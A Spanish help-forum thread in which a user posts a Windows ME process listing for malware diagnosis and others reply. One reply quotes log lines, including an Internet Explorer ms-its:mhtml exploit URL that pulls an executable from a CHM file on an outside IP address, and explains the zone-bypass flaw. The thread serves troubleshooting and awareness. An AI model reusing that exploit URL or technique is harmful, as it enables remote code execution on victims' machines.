ProductVersion : 4.90.3000
Copyright : Copyright (C) Microsoft Corp. 1991-2000
CompanyName : Microsoft Corporation
FileDescription : Componente del n
InternalName : KERNEL32
OriginalFilename : KERNEL32.DLL
ProductName : Sistema operativo Microsoft(R) Windows(R) Millennium
Created on : 22/06/2003 05:47:23 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:2 [msgsrv32.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294915465
Threads : 1
Priority : Normal
FileSize : 11 KB
FileVersion : 4.90.3000
ProductVersion : 4.90.3000
Copyright : Copyright (C) Microsoft Corp. 1992-1998
CompanyName : Microsoft Corporation
FileDescription : Servidor de mensajes VxD de 32 bits de Windows
InternalName : MSGSRV32
OriginalFilename : MSGSRV32.EXE
ProductName : Sistema operativo Microsoft(R) Windows(R) Millennium
Created on : 22/06/2003 05:48:22 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:3 [spool32.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294913425
Threads : 2
Priority : Normal
FileSize : 44 KB
FileVersion : 4.90.3000
ProductVersion : 4.90.3000
Copyright : Copyright (C) Microsoft Corp. 1994 - 1998
CompanyName : Microsoft Corporation
FileDescription : Spooler Sub System Process
InternalName : spool32
OriginalFilename : spool32.exe
ProductName : Microsoft(R) Windows(R) Millennium Operating System
Created on : 22/06/2003 05:48:30 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:4 [mprexe.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294955541
Threads : 1
Priority : Normal
FileSize : 28 KB
FileVersion : 4.90.3000
ProductVersion : 4.90.3000
Copyright : Copyright (C) Microsoft Corp. 1993-2000
CompanyName : Microsoft Corporation
FileDescription : WIN32 Network Interface Service Process
InternalName : MPREXE
OriginalFilename : MPREXE.EXE
ProductName : Microsoft(R) Windows(R) Millennium Operating System
Created on : 22/06/2003 05:44:32 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:5 [mdm.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294862729
Threads : 2
Priority : Normal
FileSize : 116 KB
FileVersion : 6.00.8149
ProductVersion : 6.00.8149
Copyright : Copyright (C) Microsoft Corp. 1997-1998
CompanyName : Microsoft Corporation
FileDescription : Machine Debug Manager
InternalName : mdm.exe
OriginalFilename : mdm.exe
ProductName : Microsoft (R) Visual Studio
Created on : 04/09/1998 07:09:08 a.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 04/09/1998 07:09:08 a.m.
#:6 [hcount.exe]
FilePath : C:\WINDOWS\
ProcessID : 4294842601
Threads : 1
Priority : Normal
FileSize : 56 KB
Created on : 22/06/2003 05:42:27 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 12:05:50 p.m.
#:7 [symtray.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\ARCHIVOS COMUNES\SYMANTEC SHARED\
ProcessID : 4294839537
Threads : 1
Priority : Normal
FileSize : 84 KB
FileVersion : 2003.6.57
ProductVersion : 2003.6.57
Copyright : Copyright (c) 1997-2002 Symantec Corporation
CompanyName : Symantec Corporation
FileDescription : Norton SystemWorks SymTray
InternalName : SymTray.exe
OriginalFilename : SymTray.exe
ProductName : Norton SystemWorks
Created on : 21/06/2003 07:43:55 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 30/09/2002 06:01:58 p.m.
#:8 [nprotect.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\NORTON SYSTEMWORKS\NORTON UTILITIES\
ProcessID : 4294849981
Threads : 3
Priority : Normal
FileSize : 136 KB
FileVersion : 16.00.0.22
ProductVersion : 16.00.0.22
Copyright : Copyright (C) 2003 Symantec Corporation
CompanyName : Symantec Corporation
FileDescription : Norton Protection Status
InternalName : NPROTECT
OriginalFilename : NPROTECT.EXE
ProductName : Norton Utilities
Created on : 21/06/2003 07:27:03 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 20/08/2002 07:23:12 p.m.
#:9 [mstask.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294889033
Threads : 3
Priority : Normal
FileSize : 128 KB
FileVersion : 4.71.2721.1
ProductVersion : 4.71.2721.1
Copyright : Copyright (C) Microsoft Corp. 2000
CompanyName : Microsoft Corporation
FileDescription : Motor de Programador de tareas
InternalName : TaskScheduler
OriginalFilename : mstask.exe
ProductName : Programador de tareas de Microsoft
Created on : 22/06/2003 05:44:33 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:10 [csinject.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\NORTON SYSTEMWORKS\NORTON CLEANSWEEP\
ProcessID : 4294885833
Threads : 1
Priority : Normal
FileSize : 28 KB
FileVersion : 7.0.00.15
ProductVersion : 7.0
Copyright : Copyright (c) 1992-2002 Symantec Corporation
CompanyName : Symantec Corporation
FileDescription : csinject
InternalName : CSInject
OriginalFilename : CSInject.exe
ProductName : Norton CleanSweep
Created on : 21/06/2003 07:25:24 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 13/08/2002 08:00:00 p.m.
#:11 [sagent2.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\ARCHIVOS COMUNES\EPSON\EBAPI\
ProcessID : 4294884265
Threads : 19
Priority : Normal
FileSize : 110 KB
FileVersion : 1, 0, 0, 0
ProductVersion : 1, 0, 0, 0
Copyright : Copyright (C) SEIKO EPSON CORP. 2000
CompanyName : SEIKO EPSON CORPORATION
FileDescription : EPSON Printer Status Agent
InternalName : SAgent2
OriginalFilename : SAgent2.exe
ProductName : EPSON Bidirectional Printer
Created on : 04/10/2003 02:00:21 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 22/06/2000 04:00:00 a.m.
#:12 [ghoststartservice.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\NORTON SYSTEMWORKS\NORTON GHOST\
ProcessID : 4294881265
Threads : 1
Priority : Normal
FileSize : 196 KB
FileVersion : 2003.775
ProductVersion : 2003.775
Copyright : Copyright (C) 1998-2002 Symantec Corp. All rights reserved.
CompanyName : Symantec Corporation
FileDescription : Norton Ghost Start
InternalName : GhostStartService
OriginalFilename : GhostStartService.exe
ProductName : Norton Ghost Start Service
Created on : 14/08/2002 06:21:16 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 14/08/2002 06:21:16 p.m.
#:13 [ccsetmgr.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\ARCHIVOS COMUNES\SYMANTEC SHARED\
ProcessID : 4294802321
Threads : 7
Priority : Normal
FileSize : 229 KB
FileVersion : 2.0.0.635
ProductVersion : 2.0.0.635
Copyright : Copyright (c) 2000-2003 Symantec Corporation. All rights reserved.
CompanyName : Symantec Corporation
FileDescription : Common Client Settings Manager Service
InternalName : ccSetMgr
OriginalFilename : ccSetMgr.exe
ProductName : Common Client
Created on : 19/08/2003 09:58:50 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 19/08/2003 09:58:50 p.m.
#:14 [ccevtmgr.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\ARCHIVOS COMUNES\SYMANTEC SHARED\
ProcessID : 4294770773
Threads : 23
Priority : Normal
FileSize : 249 KB
FileVersion : 2.0.0.635
ProductVersion : 2.0.0.635
Copyright : Copyright (c) 2000-2003 Symantec Corporation. All rights reserved.
CompanyName : Symantec Corporation
FileDescription : Common Client Event Manager Service
InternalName : ccEvtMgr
OriginalFilename : ccEvtMgr.exe
ProductName : Common Client
Created on : 19/08/2003 09:56:12 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 19/08/2003 09:56:12 p.m.
#:15 [mmtask.tsk]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294751057
Threads : 1
Priority : Normal
FileSize : 1 KB
FileVersion : 4.90.3000
ProductVersion : 4.90.3000
Copyright : Copyright
CompanyName : Microsoft Corporation
FileDescription : Multimedia background task support module
InternalName : mmtask.tsk
OriginalFilename : mmtask.tsk
ProductName : Microsoft Windows
Created on : 22/06/2003 05:45:43 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:16 [stmgr.exe]
FilePath : C:\WINDOWS\SYSTEM\RESTORE\
ProcessID : 4294865445
Threads : 4
Priority : Normal
FileSize : 60 KB
FileVersion : 4.90.0.2533
ProductVersion : 4.90.0.2533
Copyright : Copyright (C) Microsoft Corp. 1981-2000
CompanyName : Microsoft Corporation
FileDescription : Microsoft (R) PC State Manager
InternalName : StateMgr.exe
OriginalFilename : StateMgr.exe
ProductName : Microsoft (r) PCHealth
Created on : 22/06/2003 05:48:31 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:17 [explorer.exe]
FilePath : C:\WINDOWS\
ProcessID : 4294656649
Threads : 6
Priority : Normal
FileSize : 224 KB
FileVersion : 5.50.4134.100
ProductVersion : 5.50.4134.100
Copyright : Copyright (C) Microsoft Corp. 1981-2000
CompanyName : Microsoft Corporation
FileDescription : Explorador de Windows
InternalName : explorer
OriginalFilename : EXPLORER.EXE
ProductName : Sistema operativo Microsoft(R) Windows (R) 2000
Created on : 22/06/2003 05:44:28 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:18 [ocraware.exe]
FilePath : C:\OPLIMIT\
ProcessID : 4294577321
Threads : 1
Priority : Normal
FileSize : 50 KB
FileVersion : OCRAWARE.EXE
ProductVersion : 5.0
Copyright : Copyright
CompanyName : Caere Corporation
FileDescription : OCRAWARE.EXE
ProductName : OmniPage Limited Edition
Created on : 04/10/2003 02:51:26 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 11/11/1996 02:42:52 p.m.
#:19 [ocrawr32.exe]
FilePath : C:\OPLIMIT\
ProcessID : 4294593821
Threads : 1
Priority : Normal
FileSize : 34 KB
FileVersion : 5, 0, 0, 0
ProductVersion : 5, 0, 0, 0
Copyright : Copyright
CompanyName : Caere Corporation
FileDescription : Ocraware32
InternalName : Ocraware32
OriginalFilename : Ocrawr32.exe
ProductName : OmniPage Limited Edition
Created on : 04/10/2003 02:51:35 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 04/10/1996 06:35:26 p.m.
#:20 [taskmon.exe]
FilePath : C:\WINDOWS\
ProcessID : 4294590413
Threads : 1
Priority : Normal
FileSize : 28 KB
FileVersion : 4.90.3000
ProductVersion : 4.90.3000
Copyright : Copyright (C) Microsoft Corp. 1998
CompanyName : Microsoft Corporation
FileDescription : Task Monitor
InternalName : TaskMon
OriginalFilename : TASKMON.EXE
ProductName : Microsoft(R) Windows(R) Millennium Operating System
Created on : 22/06/2003 05:48:32 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:21 [systray.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294586041
Threads : 2
Priority : Normal
FileSize : 36 KB
FileVersion : 4.90.3000
ProductVersion : 4.90.3000
Copyright : Copyright (C) Microsoft Corp. 1993-2000
CompanyName : Microsoft Corporation
FileDescription : Subprograma Bandeja de sistema
InternalName : SYSTRAY
OriginalFilename : SYSTRAY.EXE
ProductName : Sistema operativo Microsoft(R) Windows(R) Millennium
Created on : 22/06/2003 05:48:31 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:22 [wpctrl95.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\WINPORTRAIT\
ProcessID : 4294637353
Threads : 3
Priority : Normal
FileSize : 111 KB
Copyright : ogr
Created on : 03/10/2000 07:33:43 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 16/06/1999 05:47:58 p.m.
#:23 [loadqm.exe]
FilePath : C:\WINDOWS\
ProcessID : 4294631497
Threads : 3
Priority : Normal
FileSize : 7 KB
FileVersion : 5.4.1103.3
ProductVersion : 5.4.1103.3
Copyright : Copyright (C) Microsoft Corp. 1981-1999
CompanyName : Microsoft Corporation
FileDescription : Microsoft QMgr
InternalName : LOADQM.EXE
OriginalFilename : LOADQM.EXE
ProductName : QMgr Loader
Created on : 07/11/2001 03:18:22 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 03/05/2000 08:23:10 p.m.
#:24 [wmiexe.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294612321
Threads : 3
Priority : Normal
FileSize : 16 KB
FileVersion : 4.90.2452.1
ProductVersion : 4.90.2452.1
Copyright : Copyright (C) Microsoft Corp. 1981-1999
CompanyName : Microsoft Corporation
FileDescription : WMI service exe housing
InternalName : wmiexe
OriginalFilename : wmiexe.exe
ProductName : Microsoft(R) Windows(R) Millennium Operating System
Created on : 22/06/2003 05:48:38 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:25 [rpcss.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294607193
Threads : 7
Priority : Normal
FileSize : 20 KB
FileVersion : 4.71.3328
ProductVersion : 4.71.3328
Copyright : Copyright (C) Microsoft Corp. 1981-1998
CompanyName : Microsoft Corporation
FileDescription : Distributed COM Services
InternalName : rpcss.exe
OriginalFilename : rpcss.exe
ProductName : Microsoft(R) Windows NT(TM) Operating System
Created on : 22/06/2003 05:44:35 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 08/06/2000 08:00:00 p.m.
#:26 [wpwatchd.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\WINPORTRAIT\
ProcessID : 4294538149
Threads : 1
Priority : Normal
FileSize : 50 KB
Copyright : yNa
Created on : 03/10/2000 07:33:43 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 15/03/1999 02:04:30 p.m.
#:27 [realsched.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\ARCHIVOS COMUNES\REAL\UPDATE_OB\
ProcessID : 4294523649
Threads : 2
Priority : Normal
FileSize : 148 KB
FileVersion : 0.1.0.1622
ProductVersion : 0.1.0.1622
Copyright : Copyright
CompanyName : RealNetworks, Inc.
FileDescription : RealNetworks Scheduler
InternalName : schedapp
OriginalFilename : realsched.exe
ProductName : RealOne Player (32-bit)
Created on : 15/04/2003 12:21:11 a.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 15/04/2003 12:21:12 a.m.
#:28 [realplay.exe]
FilePath : C:\REAL\PLAYER\
ProcessID : 4294703713
Threads : 1
Priority : Normal
FileSize : 112 KB
FileVersion : 5.0.0.102
ProductVersion : 5.0.0.102
Copyright : Copyright
CompanyName : RealNetworks, Inc.
FileDescription : RealPlayer
InternalName : RVPLAYER
OriginalFilename : RVPLAYER.EXE
ProductName : RealPlayer (32-bit)
Created on : 16/10/2000 10:42:57 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 16/10/2000 10:42:56 p.m.
#:29 [ghoststarttrayapp.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\NORTON SYSTEMWORKS\NORTON GHOST\
ProcessID : 4294549245
Threads : 1
Priority : Normal
FileSize : 92 KB
FileVersion : 2003.775
ProductVersion : 2003.775
Copyright : Copyright (C) 1998-2002 Symantec Corp. All rights reserved.
CompanyName : Symantec Corporation
FileDescription : Norton Ghost Start
InternalName : GhostStartTrayApp
OriginalFilename : GhostStartTrayApp.exe
ProductName : Norton Ghost Start
Created on : 21/08/2002 12:45:36 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 21/08/2002 12:45:36 p.m.
#:30 [qttask.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294467901
Threads : 5
Priority : Normal
FileSize : 76 KB
FileVersion : 6.0.2
ProductVersion : QuickTime 6.0.2
CompanyName : Apple Computer, Inc.
FileDescription : Apple Computer, Inc.
InternalName : QuickTime Task
OriginalFilename : QTTask.exe
ProductName : QuickTime
Created on : 13/07/2003 10:26:59 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 13/07/2003 10:27:00 p.m.
#:31 [ccapp.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\ARCHIVOS COMUNES\SYMANTEC SHARED\
ProcessID : 4294678141
Threads : 20
Priority : Normal
FileSize : 69 KB
FileVersion : 2.0.0.635
ProductVersion : 2.0.0.635
Copyright : Copyright (c) 2000-2003 Symantec Corporation. All rights reserved.
CompanyName : Symantec Corporation
FileDescription : Symantec Common Client User Session
InternalName : ccApp
OriginalFilename : ccApp.exe
ProductName : Common Client
Created on : 19/08/2003 09:55:56 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 19/08/2003 09:55:56 p.m.
#:32 [vcdrql.exe]
FilePath : C:\WINDOWS\TEMP\
ProcessID : 4294409837
Threads : 1
Priority : Normal
FileSize : 228 KB
Copyright : odu
Created on : 27/06/2004 06:13:01 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 27/06/2004 06:13:04 p.m.
#:33 [ddhelp.exe]
FilePath : C:\WINDOWS\SYSTEM\
ProcessID : 4294404617
Threads : 5
Priority : Realtime
FileSize : 31 KB
FileVersion : 4.08.01.0881
ProductVersion : 4.08.01.0881
Copyright : Copyright
CompanyName : Microsoft Corporation
FileDescription : Microsoft DirectX Helper
InternalName : DDHelp.exe
OriginalFilename : DDHelp.exe
ProductName : Microsoft
Created on : 23/12/2002 09:43:25 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 30/10/2001 11:10:00 a.m.
#:34 [reminder.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\MICROSOFT MONEY\SYSTEM\
ProcessID : 4294429677
Threads : 1
Priority : Normal
FileSize : 36 KB
FileVersion : 7.00.1003
ProductVersion : 7.00.1003
Copyright : Copyright (C) Microsoft Corp. 1990-1998. Reservados todos los derechos.
CompanyName : Microsoft Corporation
FileDescription : Aplicaci
InternalName : REMINDER
OriginalFilename : REMINDER.EXE
ProductName : Microsoft Money
Created on : 25/07/1998 03:00:00 a.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 25/07/1998 03:00:00 a.m.
#:35 [ypager.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\YAHOO!\MESSENGER\
ProcessID : 4294411613
Threads : 8
Priority : Normal
FileSize : 1456 KB
FileVersion : 5, 6, 0, 1344
ProductVersion : 5, 6, 0, 1344
Copyright : Copyright 1998-2003
CompanyName : Yahoo! Inc.
FileDescription : Yahoo! Messenger
InternalName : Yahoo! Messengerr
OriginalFilename : YPager.exe
ProductName : Yahoo! Messenger
Created on : 30/07/2003 10:48:32 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 15/07/2003 05:40:54 p.m.
#:36 [msnmsgr.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\MSN MESSENGER\
ProcessID : 4294316705
Threads : 2
Priority : Normal
FileSize : 4572 KB
FileVersion : 6.1.0211
ProductVersion : Version 6.1
Copyright : Copyright (c) Microsoft Corporation 1997-2003
CompanyName : Microsoft Corporation
FileDescription : Messenger
InternalName : msnmsgr
OriginalFilename : msnmsgr.exe
ProductName : Messenger
Created on : 05/03/2004 02:01:00 a.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 05/03/2004 02:01:00 a.m.
#:37 [webshotstray.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\WEBSHOTS\
ProcessID : 4294269309
Threads : 1
Priority : Normal
FileSize : 188 KB
FileVersion : 1.3.0.3181
ProductVersion : 1.3.0.3181
Copyright : Copyright (C) 1998
CompanyName : The Webshots Corporation
FileDescription : Webshots Desktop Tray Application
InternalName : WEBSHOTSTRAY
OriginalFilename : WEBSHOTSTRAY.EXE
ProductName : Webshots Tray Application
Created on : 05/08/2001 08:38:40 p.m.
Last accessed : 28/06/2004 03:00:00 a.m.
Last modified : 13/09/2000 01:51:58 p.m.
#:38 [osa.exe]
FilePath : C:\ARCHIVOS DE PROGRAMA\MICROSOFT OFFICE\OFFICE\
ProcessID : 4294249497
Threads : 1
Priority : Normal
FileSize : 50 KB
Copyright : tray.exe\
agradecere cualquier pronta y efectiva solucion
muchas gracias de verdad...
espero con ansias 1 respuesta
-
Creo q te falta la mitad del log Pertusi77
-
no es asi todo lo que me salio.. en eso que puse no hay nada que este desubicado ..si a mi tambien me parecio que era mas corto.. de todas formas si sos tan amable de decirme si en eso esta algo fuera de lugar te agradeceria mucho
gracias
-
Lo siento pero yo no controlo esto :( no puedo decirte si esta bien o mal. Fats es el entendido.
-
Curioso lo que pasa con esta página del foro al cargar el post el antivirus (avp 5.0.121) salta lo siguiente:
Access to the object X:\..\..\..\cache\nnnnnn.htm is blocked. Object is possibly infected with a virus Exloit.html.mht. It is recommended to quarantine this object.
Supongo que lo hace por esto, ya que la página para justo antes de mostrarlo:
O4 - HKCU\..\Run: [cvchost] c:\windows\svchost.exe
O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\foo.mht!http://81.211.105.37/20609/online.chm::/on-line.exe
Pues eso, es solo una curiosidad. :)
-
No era lo que puse arriba lo que hacía saltar el AV. En realidad no sé lo que es.
Cuando cargo esta segunda página no salta el AV, por lo que no es lo que puse arriba.
Guardé la página en el disco duro con imágenes y no salta al escanearla. :shock:
Enredado ya con el tema, esto más o menos es lo que he visto por ahí:
Supuestamente el exploit se aprovecha de una falla del internet explorer y la forma en que maneja la validación de código en los archivos de ayuda *.chm
Para que iexplorer visualize las ayudas, estas se invocan con protocolos varios: its://, ms-itss://, ms-its://, mhtml:// (entre otros)
El problema consiste en que Internet Explorer no aplica
correctamente la protección de zona que impide la ejecución
de código en páginas ubicadas en páginas remotas. Si se le
pasa a Internet Explorer una URL del tipo mhtml:// que apunta
a un archivo no existente, se puede forzar la ejecución de un
archivo CHM remoto que contiene código hostil y que será
ejecutado como si fuera un archivo local.
Algún virus hay que se aprovecha de la vulneravilidad.
http://www.hispasec.com/unaaldia/1993